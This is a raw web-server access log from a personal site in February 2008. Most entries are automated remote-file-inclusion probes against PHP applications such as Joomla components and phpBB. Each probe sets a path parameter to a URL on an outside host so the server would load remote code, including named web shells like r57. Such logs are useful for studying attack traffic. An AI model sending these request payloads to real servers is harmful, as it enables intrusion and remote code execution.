87.234.219.44 - - [26/Feb/2008:12:35:25 -0800] "GET /myevent.php?myevent_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:35:26 -0800] "GET /logs/myevent.php?myevent_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.213.194.42 - - [26/Feb/2008:12:35:37 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Feb/2008:12:35:38 -0800] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Feb/2008:12:35:38 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.201 - - [26/Feb/2008:12:35:51 -0800] "GET /logs//config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.150.78.201 - - [26/Feb/2008:12:35:51 -0800] "GET //config.inc.php?path_escape=http://fullsafe.iespana.es/testiculo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:12:36:00 -0800] "GET /logs/access_080119.log//codebb/lang_select?phpbb_root_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:12:36:01 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:36:07 -0800] "GET /logs/access_080121.log/myevent.php?myevent_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:12:36:37 -0800] "GET /logs/access.log//codebb/lang_select?phpbb_root_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:36:51 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:36:51 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:36:52 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.83.47.82 - - [26/Feb/2008:12:38:03 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [26/Feb/2008:12:38:03 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [26/Feb/2008:12:38:03 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.234.219.44 - - [26/Feb/2008:12:38:26 -0800] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.47.82 - - [26/Feb/2008:12:38:50 -0800] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.20.84 - - [26/Feb/2008:12:39:48 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://berkshiretradingpost.com/response.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.87.20.84 - - [26/Feb/2008:12:39:48 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://berkshiretradingpost.com/response.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.23.156 - - [26/Feb/2008:12:40:37 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.37 - - [26/Feb/2008:12:40:39 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:12:41:38 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:43:05 -0800] "GET /logs/access_080130.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:12:43:24 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://avvvvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:12:43:25 -0800] "GET //lazarusgb/admin.php?include_path=http://avvvvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:12:43:25 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://avvvvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:43:26 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:43:46 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:12:43:46 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:45:03 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:45:03 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:45:04 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:45:05 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:45:06 -0800] "GET /logs/admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.144 - - [26/Feb/2008:12:46:06 -0800] "GET /?S=A HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.209.196 - - [26/Feb/2008:12:46:29 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:46:38 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:12:46:38 -0800] "GET /logs/admin/index.php?o=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.58.169 - - [26/Feb/2008:12:46:55 -0800] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:12:47:04 -0800] "GET /logs/access.log//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:12:47:05 -0800] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:12:47:05 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.33.49.76 - - [26/Feb/2008:12:47:10 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
64.33.49.76 - - [26/Feb/2008:12:47:10 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.elitesense.com/spider/newnudecash/sistem.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
87.106.209.196 - - [26/Feb/2008:12:47:33 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.209.196 - - [26/Feb/2008:12:47:34 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.140 - - [26/Feb/2008:12:47:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
65.55.209.206 - - [26/Feb/2008:12:47:55 -0800] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.185.237.140 - - [26/Feb/2008:12:48:00 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.10.5.213 - - [26/Feb/2008:12:48:07 -0800] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "http://www.st-owners.com/forums/showthread.php?t=28172" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.195.44.93 - - [26/Feb/2008:12:48:08 -0800] "GET /logs/access_080122.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.10.5.213 - - [26/Feb/2008:12:48:11 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
196.31.153.35 - - [26/Feb/2008:12:48:21 -0800] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:48:22 -0800] "GET /logs/access_071222.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:48:22 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:48:22 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:48:23 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:48:32 -0800] "GET /logs/access.log//modules/poll/block.poll.php?GLOBALS[where_cms]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:48:33 -0800] "GET //modules/poll/block.poll.php?GLOBALS[where_cms]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:12:48:33 -0800] "GET /logs//modules/poll/block.poll.php?GLOBALS[where_cms]=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.10.5.213 - - [26/Feb/2008:12:48:36 -0800] "GET /bikes/CreSTOC07/CreSTOC2007009.jpg HTTP/1.1" 200 458752 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:12:48:36 -0800] "GET /logs/access_080201.log/send_reminders.php?includedir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:48:45 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:49:25 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:49:26 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:49:31 -0800] "GET /logs/access_080121.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [26/Feb/2008:12:49:43 -0800] "GET /logs/access_080107.log//?NWCONF_SYSTEM[server_path]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [26/Feb/2008:12:49:44 -0800] "GET //?NWCONF_SYSTEM[server_path]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
62.220.146.59 - - [26/Feb/2008:12:49:44 -0800] "GET /logs//?NWCONF_SYSTEM[server_path]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 200 36264 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:12:49:48 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:12:49:48 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.220.146.59 - - [26/Feb/2008:12:50:08 -0800] "GET /logs/access_080108.log//?NWCONF_SYSTEM[server_path]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.114.141 - - [26/Feb/2008:12:51:00 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.82.34.252 - - [26/Feb/2008:12:51:22 -0800] "GET /logs/access_080131.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.99.154.68 - - [26/Feb/2008:12:51:28 -0800] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:51:48 -0800] "GET /logs/access.log/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:12:51:48 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.17.114.133 - - [26/Feb/2008:12:52:16 -0800] "GET /logs/access_080131.log/index.php?pagina=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Feb/2008:12:52:17 -0800] "GET /index.php?pagina=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Feb/2008:12:52:17 -0800] "GET /logs/index.php?pagina=http://h1.ripway.com/splinterox/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.57 - - [26/Feb/2008:12:52:18 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
59.106.19.57 - - [26/Feb/2008:12:52:18 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
38.99.154.68 - - [26/Feb/2008:12:53:09 -0800] "GET /logs/access_080126.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [26/Feb/2008:12:53:18 -0800] "GET /logs/access_080130.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [26/Feb/2008:12:53:19 -0800] "GET /logs/access_080130.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:53:26 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:12:53:37 -0800] "GET /logs/access_080128.log/index.php?sub=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:12:53:59 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:18 -0800] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:18 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:18 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:38 -0800] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:55 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:55 -0800] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:54:55 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:12:55:06 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:12:55:06 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.114.141 - - [26/Feb/2008:12:55:08 -0800] "GET /logs/access_080111.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.114.141 - - [26/Feb/2008:12:55:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.114.141 - - [26/Feb/2008:12:55:29 -0800] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:12:57:29 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:12:57:51 -0800] "GET /logs/access_080107.log//?NWCONF_SYSTEM[server_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:12:57:52 -0800] "GET //?NWCONF_SYSTEM[server_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:12:57:53 -0800] "GET /logs//?NWCONF_SYSTEM[server_path]=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 36264 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:58:13 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:58:13 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:12:58:14 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:12:58:21 -0800] "GET //?NWCONF_SYSTEM[server_path]=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [26/Feb/2008:12:58:30 -0800] "GET /logs/access_080131.log/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
